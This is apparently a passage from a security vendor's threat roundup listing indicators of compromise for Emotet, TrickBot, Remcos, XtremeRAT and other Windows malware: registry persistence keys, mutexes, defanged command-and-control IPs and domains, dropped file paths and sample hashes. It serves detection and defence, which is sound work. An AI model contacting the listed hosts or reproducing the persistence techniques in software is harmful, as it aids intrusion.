Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Malware.Zusy-9970856-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys (occurrences)
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: LanguageList) 8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: @explorer.exe,-7001) 8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\APPLICATIONDESTINATIONS (Value Name: MaxEntries) 1
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
47[.]111[.]103[.]192 13
Domain Names contacted by malware (occurrences; contact does not by itself indicate maliciousness)
os[.]ieycc[.]com 13
Files and/or directories created (occurrences)
\Client.txt 13
%TEMP%\Tomato.ini 13
%APPDATA%\testing.dat 13
\TEMP\1E0F0E0A120B156B155B15E0C0F160E0D160A.exe 1
\TEMP\1F0F0D0C120A156D155E15E0A0E160B0C160F.exe 1
\TEMP\1F0B0B0A120E156C155E15D0A0F160D0E160D.exe 1
\TEMP\1C0B0F0A120C156F155C15E0B0A160F0E160D.exe 1
\TEMP\1B0C0D0C120A156E155C15C0E0D160D0B160E.exe 1
\TEMP\1B0F0A0D120F156E155C15F0C0E160E0F160A.exe 1
\TEMP\1E0F0B0A120F156F155E15D0B0E160B0D160E.exe 1
\TEMP\1D0D0C0E120C156D155F15A0A0E160C0C160A.exe 1
\TEMP\1E0D0C0D120F156E155C15F0A0E160D0C160F.exe 1
\TEMP\1C0B0C0B120D156E155E15A0E0F160B0D160D.exe 1
\TEMP\1E0C0F0F120A156A155B15A0F0A160E0D160A.exe 1
\TEMP\1E0C0A0A120B156F155D15A0E0F160B0A160A.exe 1
\TEMP\1E0B0C0D120C156C155A15D0D0D160B0D160C.exe 1

File Hashes

015c6d06fe9aaa4844b5e008796cbb854cf6765c2ca398f596dd2fceeceb6c95 0de5af728d4834e450386979efd9681bd54bfeb65f687cccd621f3a20331c050 43d5fb959a8c848030537e37f0d0638bc57bb83652dba85ee2e868a17f1d10ef 568bc0b8c2e914ca7cb2f62bfd82839c584d14d3d47b96ea34703b9d024c78ec 7539e13bb8b001f08742f38c29b42135a2b414e2ba095cf3bf74f38db78f3e0f 80459aa210f4e16b123a27b47c1191872b79a6c6a8751613ad1b649a0f1f3426 974e745bbf32ea7bf0bcff7bd04e3b13f8f3c9cf8a79d01f34658729c793e333 aa22f56078cf431f2587ea270f428fff6d4eee5b08d542b40b89a9712e14e5b3 acf7e8303fd53c63b778a611773267ecf001225772bee1fccbd2a2370ad6e658 ae24b008cb2dc1855367cd814581f1092d9899a77e982f8fc746409c29afbaaa b13513bd0c731f688fe25804c6dd74a3126d0494549368c8d692bd85d2024e5f e35cb24702c24b57edf8f1439a1409b6c8c0f97bc30a90a3c396fdd0f3c38f84 f9501ffa9e293c88c61e0071fdc5b7ce2d00e1c8bc20a564ab906dfb9565e4c7

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Remcos-9970861-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 42 samples
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
172[.]98[.]192[.]37 42
Domain Names contacted by malware (occurrences; contact does not by itself indicate maliciousness)
www[.]djapp[.]info 42
Files and/or directories created (occurrences)
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 42
%APPDATA%\Microsoft\Windows\Cookies\NFIM9G9G.txt 10
%TEMP%\FltFD54.exe 1
%TEMP%\FltFAC5.exe 1
%TEMP%\FltFF0C.exe 1
%TEMP%\FltA28D.exe 1
%TEMP%\FltE1AD.exe 1
%TEMP%\FltFAB6.exe 1
%TEMP%\Flt593A.exe 1
%TEMP%\FltF8C2.exe 1
%TEMP%\Flt4F6E.exe 1
%TEMP%\FltFB71.exe 1
%TEMP%\FltA461.exe 1
%TEMP%\FltFD74.exe 1
%TEMP%\Flt23BD.exe 1
%TEMP%\Flt8A88.exe 1
%TEMP%\FltBC04.exe 1
%TEMP%\FltF633.exe 1
%TEMP%\FltB040.exe 1
%TEMP%\Flt6184.exe 1
%TEMP%\Flt540D.exe 1
%TEMP%\Flt5D82.exe 1
%TEMP%\FltBD3A.exe 1
%TEMP%\tnf5FD1.exe 1
%TEMP%\FltC777.exe 1
*See JSON for more IOCs

File Hashes

00cda027a316d979f614cd747e8eea14fcc1f7a144b5eb5fc385ea3b52ada9ac 04a7c806cd6404d5547bf136331733e970364c0090c705b0002170ca7fa59882 06a0c6a86e47342846759164e0a7da0087e5926d1bdf48b64ad106b6e53951a4 0d103909b0c3e6ac0021b1aa8bbd17b50d1f94ccfb6011a1b70609b6a45668fe 0d503f2d89c74456f441b95033f1f7f1b5f8c9b9ef338c177beb7e22c3844cb8 13d63a2102b3685464c7f32f95fb4ed6287f51db1da590f7141ad36d2ec0fe00 16de9b5489c9bc4900f94a6939e4a5124caee0ce2ac4dcd938850385c35ecd94 16e1726e22af546ae83bf70500135f69e1f3805c2c49752b6098c07f0815307a 1bb3b038b6da9ca30bf12a24ab4e0361ff60c6375bed74492ac37652e2ecd3da 23f59e71fd7d520a50ae1aaea2c026ae2f05a85d6bf1f24301ceac52e713157b 24d621a695ef4fae5b296bc2bb6071cc90b9c56415f70464797e69080b6a7e75 2635c53ba6293fe95e539dfd0f480835ceb7b47c6971a3024ae8443893eca176 2c65cccfb66e0773395cd78f4c742f03cdf3d482357278cf53cd47ea87f62f04 2d82667b13cc3acb398ae87a83674ce3a334867e82d20b4fd809a14d10323084 2e53c50fd916da51599be464f226b09f28d70fe323cb292c115b9723d402ddde 3457b58ade09a9a581003687d9bd904c6200dcc96aafbb24450c371a165c96d8 3832ee4b74d72c5b4e8299cc9e20248145ff74a7364ebfeb2baa9ee60c0a00d8 38ff5081e308b00e57028e3ad749ae4dccf165796a073fafacd6e6cbad31cc21 3e278b7296bcb58b47e8d60ee9a7f44c548a6d790cdf45fcdff6bc526c395a93 3f4fa0de7c9e2b18b0e16b1cbd72dcc279d5ab6b727992a158ed4bced8663f87 40318b04af3f4761f989d5725e61fc41bd034990e3a86478c897466416632c44 4126cae93a6d1471fbf37ef4a73347ed4fa136486fe7229b06721db5d50ed27c 479e0fa51921d000d9ae53beb96c8d88b3e90ba563b7595db6d015fe0c41beea 50532f85c712a7ba7e79ba23130a568fdfcfde7c3bdbcec90edea02aacef7f9b 535e141dc2b44bdafa9fd3ef6c3355413bd7837c5bfc398c608ea49e150b7727
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            This has coverage
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    This has coverage
WSA                         This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Malware.Emotet-9970880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{39D7DE2A-54FC-2744-D7AC-675623A7BCA2} 25
Mutexes (occurrences)
{24d07012-9955-711c-e323-1079ebcbe1f4} 25
{bf18992f-6351-a1bd-1f80-485116c997cd} 25
{dbad1190-816b-947c-9b01-53ef739d7edb} 25
{ed099f6b-73d9-00a3-4493-daef482dc5ca} 20
Files and/or directories created (occurrences)
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 25
%System32%\Tasks\Ryddmbivo 25
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 25
%System32%\8452\eudcedit.exe 1
%APPDATA%\F9NSFA\MRT.exe 1
%APPDATA%\EoXbu\BdeUISrv.exe 1
%System32%\9450\VSSVC.exe 1
%System32%\7744\ComputerDefaults.exe 1
%APPDATA%\RAQ9\calc.exe 1
%System32%\9936\psr.exe 1
%APPDATA%\Q7e9\rekeywiz.exe 1
%System32%\5094\WindowsAnytimeUpgrade.exe 1
%APPDATA%\U6yhd\DeviceDisplayObjectProvider.exe 1
%System32%\5022\msra.exe 1
%APPDATA%\EtXM\fvenotify.exe 1
%System32%\1402\ddodiag.exe 1
%APPDATA%\bsPEU\wbengine.exe 1
%System32%\6726\StikyNot.exe 1
%APPDATA%\Kal6bb\sethc.exe 1
%System32%\6787\ie4uinit.exe 1
%APPDATA%\Y74EoZ\Dxpserver.exe 1
%System32%\7651\rrinstaller.exe 1
%APPDATA%\aF7U\WerFault.exe 1
%System32%\6604\DeviceDisplayObjectProvider.exe 1
%APPDATA%\rmluRRx\MRT.exe 1
*See JSON for more IOCs

File Hashes

0be6c8c9f6626f0cbc875a04f81d65ec51646285f607fc23610ced0698d2d356 0e00806596a0084133b662804d645e485a94d42b50e7634608bfc572bc6f99bc 10d50610dc069e961878c8d2be79f7ba638125c2f0229086f27d2261f7ef7074 209494092b65fdebe368f90fdf69cd878f931fb334c059611ccabe84301887e2 24273a46f41c978ebd1b7014cd43c05d7273e638fa539e21adf9b16fcd6d7fa4 270234993c0381d55e1d5615099a692a0e11139d6d5b353f625ac6197cc5fadd 2ce15b1bfa8a577f79da8bbcf2159bf3661aed963cdbbb59ddbf333da4bb52ea 370de40215ce6a4e8f27e33d7a6edcd9cc4c86dc39aa86246d02308f556ff39e 5239bbf6672c93344f21741c4016ea154db5f6aa3989514244de6c55532f54d4 5341a8e7076ea8dbba28ed69ec1130f361c7e90505afbb191f639d6b8295a3e7 634295ad711f68679e6471766d8ca49454c7276348211b6d99a5539e314e7ddb 64c51179f273e00dcb08ddf0c401a3e7c6b4441421f4a0f907bc32f4aaf54191 65c0c35adfcd488cde26d72ba39dd77052f0d6f54c40d10003d824ce1079a630 670db2f68e0bb350f98d1f0ea9624e45536473bb9f1552270be89d87aba17ed9 77c9d7eb923718013ec2145d35a18f17b326655e226b6f252ca6967b0837b39a 8ded5e3631dcd94576d1770289b38005c95c1456588157fd01ea6191c7bcaf1a 91c351ad5a31c40ccf05069b4dde6d0d8e2ff7e78118ca4d110bfe8fcef7d5b6 96e1d30dda3746847269a2707bf4261deadf3d146d1e9df5bd163743ef6b0902 9cebaa66b09ae6043e137c87fece4f2f55a3ae9cbbbb64414e0202a6d3db8932 9d019b660a52484961f7d540d3fe62da22c2c09be968474a614f9dd94ae8c7e5 a2074b34223a80ea0a46784e03ab9e09f86deb98c470c10b2999692fe19777b3 a81460aa2b31719c28672cc624c8fd83e3cbde9d4fc59fb1c55a0713b22a031b a8e2070710eb026f8d9aa46032576b1d474171ea11bb6d2cff97cc9e2069a3af ae65c3182b13c9012b1fc98d483a3c1c7bfd82193d1cd14b1e2a0572458530b1 ae8b637375e736db787d31a4081f2f39ce25908f3276807e43a6eceb4e511377
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.TrickBot-9970890-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys (occurrences)
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: LanguageList) 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: @explorer.exe,-7001) 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000) 2
Mutexes (occurrences)
Global\VLock 3
Global\683173c1-3af4-11ed-9660-001517635527 1
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
104[.]18[.]115[.]97 2
91[.]83[.]88[.]51 1
92[.]63[.]102[.]64 1
195[.]133[.]144[.]237 1
34[.]160[.]111[.]145 1
195[.]133[.]196[.]130 1
Domain Names contacted by malware (occurrences; contact does not by itself indicate maliciousness)
obyavlenie[.]lisx[.]ru 10
icanhazip[.]com 2
ipecho[.]net 1
Files and/or directories created (occurrences)
%APPDATA%\winapp\Modules 3
%System32%\Tasks\services update 3
%APPDATA%\winapp\client_id 3
%APPDATA%\winapp\group_tag 3
%APPDATA%\winapp 3
%APPDATA%\winapp\24ae736c30cacc5f26f34e07c47ca97c.exe 1
%APPDATA%\winapp\0g5d59dff6a3d3g20046c0ga554f8f9ef8d3e2c767g46c2592d53d6c604df5g9.exe 1
%APPDATA%\winapp\39g7366fcac6cdd0a64ag077e5ga30354aggg87d682e9cd06940033777cefaf2.exe 1

File Hashes

0a9fd6d744cc4fa8e08eee7c95c58d6cb9cb995a249597bdc8beba4ab5fdd921 0f4c49cee6a2c2f10036b0fa443e8e9de8c2d1b757f36b1491c42c6b503ce4f9 14bf94de8b881459e2f6f49051b1411da60e3526251751048bdde18f99d93f1e 29f7266ebab5bcc0a53af077d4fa20243afff87c681d9bc06930022777bdeae1 42162ca740023f144cf1f5efc8f9680f5db0ac16e0cf9eeb88f57275a5bbd38e 489d8e1c47548164a35abb21dbe155972aa09e6c65c0fd7456baf79d3ffb3539 7820f15d39888555e5d2189015d13491d58e2c345921064777155febcaf9b88e 8c1326a8e1f6c781441f3a5da6fe962337a03b9a3ffd93495e933e051d24f4a0 eac3e3c5636e62a6865ff6e048875506d16ed22ffd8caca23529407eb94a2478 f3395ab28c54a61118784d205926e7122ff7735d92d992c22db9dd63fd3a8e28

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            This has coverage
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.XtremeRAT-9971238-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 16
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> (Value Name: InstalledServer) 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: HKLM) 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: HKCU) 15
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> (Value Name: ServerStarted) 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{T88RCWLO-A2V2-4LXR-TJ24-W4CWO446W6OJ} 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{T88RCWLO-A2V2-4LXR-TJ24-W4CWO446W6OJ} (Value Name: StubPath) 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{424A7MGK-RCMT-8C4V-40EM-XW7BLA8PVRC7} 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{424A7MGK-RCMT-8C4V-40EM-XW7BLA8PVRC7} (Value Name: StubPath) 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5K3TI7P5-LW5S-LR18-4174-DG7KKUL703V7} 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5K3TI7P5-LW5S-LR18-4174-DG7KKUL703V7} (Value Name: StubPath) 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} (Value Name: StubPath) 2
Mutexes (occurrences)
XTREMEUPDATE 16
<random, matching [a-zA-Z0-9]{5,9}EXIT> 15
<random, matching [a-zA-Z0-9]{5,9}>PERSIST 11
<random, matching [a-zA-Z0-9]{5,9}> 6
zZgdeZ8P 5
Q6gWX0 5
Q6gWX0PERSIST 5
Global\<random guid> 4
Domain Names contacted by malware (occurrences; contact does not by itself indicate maliciousness)
profesorjedi11[.]myftp[.]biz 10
profesorjedi3[.]myftp[.]biz 3
clarityz[.]no-ip[.]biz 2
dynamic[.]no-ip[.]biz 2
cooempresas1[.]ddns[.]net 1
Files and/or directories created (occurrences)
%TEMP%\x.html 15
%SystemRoot%\SysWOW64\System32 10
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.dat 6
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg 6
%SystemRoot%\SysWOW64\Sistem32 5
%APPDATA%\Microsoft\Windows\zZgdeZ8P.cfg 5
%SystemRoot%\SysWOW64\System32\crrsc.exe 5
%APPDATA%\Microsoft\Windows\zZgdeZ8P.dat 5
%APPDATA%\Microsoft\Windows\Q6gWX0.cfg 5
%SystemRoot%\SysWOW64\Sistem32\crrsc.exe 5
%APPDATA%\Microsoft\Windows\Q6gWX0.dat 5
%SystemRoot%\SysWOW64\System32\csrrs.exe 3
%SystemRoot%\SysWOW64\System32\csrss.exe 2
%SystemRoot%\SysWOW64\Drivers\System.exe 1

File Hashes

02bbfb5be9238a07f4bbc310640558187fffe927b6c61aef277f25e556b42976 034fd97c565ab91825e7d810d5e629f00bb25f54ac1ed7f1846e7f1c23d1ecd2 104a08c153d9d099bad368fc405a2888a153bfaa1cf33f99f43fbc1b97d0282f 1a7fa38a87b8d63bdef718b54626476dd952673e010877eb0412041a227ae587 1b70089136743505bd03a024ed1d6faca2a618397aecf14eceafed7e708c42ef 1d281e8cd1c5e451d069a2df9eed854f4bfa28e91881e7e2bfea2be0cfd6e2d0 2a4841ab8656fedadeb5dcc16821ca4789ba29a1df607c72f73fe6de8c55f965 4a5a09ce229c5f06f96114b0c55b1b2a645b75ab6e5f1f3df524efc9e6b549df 4e960f7a51969cc989219642701cb327e7713462eff60866099fb16632e1c636 521f339fe84053ddc608a8f1faf2774ea1f6fa1ee3ad252f642967f27c2ebb2e 52f4aba104b5caadff9baa7eb92e4ff21c176ff183a59f0283555de081e74c9a 53743558915afca3fcf12a83095ed8448502c37ac0ce847268bd34ff2b17eaef 54d8e6f9d64d480ad1381ddcd730d786be7b94b34154fa9ae6a46fc06670732a 58432dc37d6e18bf7f719c42d1a955374dc04c737ec433384fa61ea7c895ce8a 5f0a9ba0fc1146512ec06df04fb3eedcaaf67df5534d2895bdee7d39dbb767d4 6aeceda58114f30d5286bf84e92bfc293d5fb1ed4648c29d9e6ba6e229ad6c0a 73711c78caf84f57df3e54a7e0d47dc5b91c73d521e6e5de2da31694c7a2cd1d 747ae8b9f401e6f92381039c80d98f2fbff9f1c94ab1479c23e9bd67714208b5 7d56d2784dafc2edb6f002e66504b3222f899712167f5d67878e576adf5bfff4 87365c8be5e1df23024d4f06108ca715ca6960fab1db19241af01dc249049b34 95774b16ad3920dee24ad1211ad677003bace3db07e351dcfa92ea8c9fb0de4d 9811dc1790865ba850a085b86faf45d12e6d18de3746fba1f79e7d5bc07b81e6 9fc0af5f00d92876795d06cadc1ec27ce789be7d4396cca1a4d39c10a1a13cee cf6bf580a1c08b6d4c8e4b73c65a156dd87e6157b358a22f58e6c4e741a62088 d2dd951900f73760709d95358434a8d382363f78cbd78a4476e361225b2fdb90
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Kuluoz-9971090-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\HLUAPPSN (Value Name: simfbhec) 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: fihacxpj) 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: rtvamnqd) 1
<HKCU>\SOFTWARE\UTLRUTMU (Value Name: jqusubuo) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: kilanrco) 1
<HKCU>\SOFTWARE\AUBBBWXT (Value Name: ibmqpuls) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: opoiitvt) 1
<HKCU>\SOFTWARE\BWCRDATG (Value Name: qmiabusl) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: mwxoukfx) 1
<HKCU>\SOFTWARE\BTTXALDX (Value Name: micawbbp) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: jtqieuec) 1
<HKCU>\SOFTWARE\BBWAIJEJ (Value Name: lmpebxqp) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: emgsvrci) 1
<HKCU>\SOFTWARE\MNSVSFDT (Value Name: jkxkagel) 1
<HKCU>\SOFTWARE\MBJFFRTQ (Value Name: bgmxnfso) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: akpgniqk) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: hrcgucbt) 1
<HKCU>\SOFTWARE\NTKIGTHP (Value Name: etduinsg) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: pjecpkuu) 1
<HKCU>\SOFTWARE\NHSATHPS (Value Name: mxopsxdc) 1
<HKCU>\SOFTWARE\HPEDSDSE (Value Name: vfkeebww) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: icccipkm) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: ilxotnrg) 1
<HKCU>\SOFTWARE\AFTNNBRU (Value Name: kchufmmw) 1
Mutexes (occurrences)
aaAdministrator 26
abAdministrator 26
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
69[.]64[.]36[.]244 21
16[.]156[.]201[.]237 17
110[.]77[.]220[.]66 15
5[.]249[.]139[.]132 15
85[.]12[.]29[.]251 13
5[.]175[.]166[.]35 13
130[.]60[.]202[.]71 11
198[.]57[.]165[.]46 10
Files and/or directories created (occurrences)
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

01e772c69c3d96d7da41baf1b4630a9b93cda39bd4b5b0234f1de2a818788965 0507e74fa55bfb2a725358b0e5d2a3ad82d95a15b8dda89eda0892276855c6e0 0575881e5f371494a9b928ea409bce3fc15b35f4a6fc47f5b3ccc267e6428d05 13830d13f9538029311649ec0b7d2b70afd36d0d38432550c973123429eb940b 14b22ef72fd4f36063c344d7358e32d9529010b303b09bcc11f562bf2d4981a7 1f226936fa8a2ae6ff457619b2883377cbe741decadc705095d4527a7ae9a4d8 21f96423b4b10c910ef1ae4f584ed1e49944f2166c41aac0d9f53ad042933f89 25c31d64ed3db07f502aee95703ec407b34dff5a3fdc34bf2b3b64250f2ec0e2 3578e19cbb128d0b2b7fb009c8041deed69144c0e20e6c58c18967a2abcc0c1b 422f405e2d70ed3bd58f6e9c4ef7d1a4ed8b912fc8acde5cab9068f34fc55f09 46b398648a6f022657c1a7a6bf0dae147562f354b34fa9b82103d8566b01c771 4cc31dc0d33247799cb383ede808dea70ab9081847e46b2ce95e2c054cd97011 576ed58a06ae914ae06a711af19b30a9f02ece2d435f84b7bea71fedc19dd995 5bad5333dcfea5b33727b34cde45b54d36cbf01d3fb0a1a915de8df1569b4fb1 5e3329e3193099fe8e09922ac85a7ab3e8ae89f0ae4f0f7a93fb30aacc7726e3 5e398a7762fe420158605cfb72bc309197c7c9346fc43a5cc8ccb0a14db25483 66b43dd194bf97f705c361ad1cc82a0f5c1afca7b03d57f99a3011cdefdc536f 6da9fe76f563ff6265b8971b601fb5037a93011fb16294b5ee7564f332d554ed 6ed6b8dececdaf3ee4ce0072d309125c5cef6e3ffef23f48baa3b0d3763462be 7c42e9ea360ccfb28b41c3490b305dcace56fea64e858ac3cde0984f6c9f3d07 816c6679de23475fe46588ce4380091c985ad689210fbf4daea6ca383f423465 